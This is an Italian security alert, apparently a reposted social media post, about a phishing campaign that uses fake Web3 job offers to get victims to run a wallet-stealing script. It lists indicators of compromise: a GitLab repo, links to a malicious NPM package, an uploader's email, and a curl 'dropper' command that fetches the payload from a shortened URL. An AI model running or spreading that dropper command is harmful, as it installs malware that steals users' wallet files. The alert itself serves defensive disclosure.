🚨 Avviso di Sicurezza TI 🚨 Secondo il partner della comun

🚨 Avviso di Sicurezza TI 🚨
Secondo il partner della comunità @1nf0s3cpt, una campagna di phishing attiva sta prendendo di mira gli utenti di Web3 con offerte di lavoro false (ad es. $120/ora) per ingannarli a eseguire uno script malevolo che ruba file di wallet.
🔍 I principali IOCs:
🔸Repo GitLab: https://t.co/ivGN93PS4b
🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"
🧪 Il metodo d'attacco è molto simile all'uso precedente di pacchetti NPM da parte di Lazarus per diffondere codice malevolo:
https://t.co/bBC4i2vYpA
🚨 Abbiamo trovato che un nuovo pacchetto NPM malevolo è stato appena pubblicato:
https://t.co/SjgmO1FOIL
🔸Probabilmente collegato a GitHub: apollo-hero
🔸Email dell'uploadatore: skelstar125@gmail.com
⚠️ NON installare o eseguire pacchetti o script sconosciuti. Verifica sempre le fonti.
#LAZARUS #Phishing

.css-1iqe90x{box-sizing:border-box;margin:0;min-width:0;color:#EAECEF;}🚨 Avviso di Sicurezza TI 🚨

Ultime notizie

🚨 Avviso di Sicurezza TI 🚨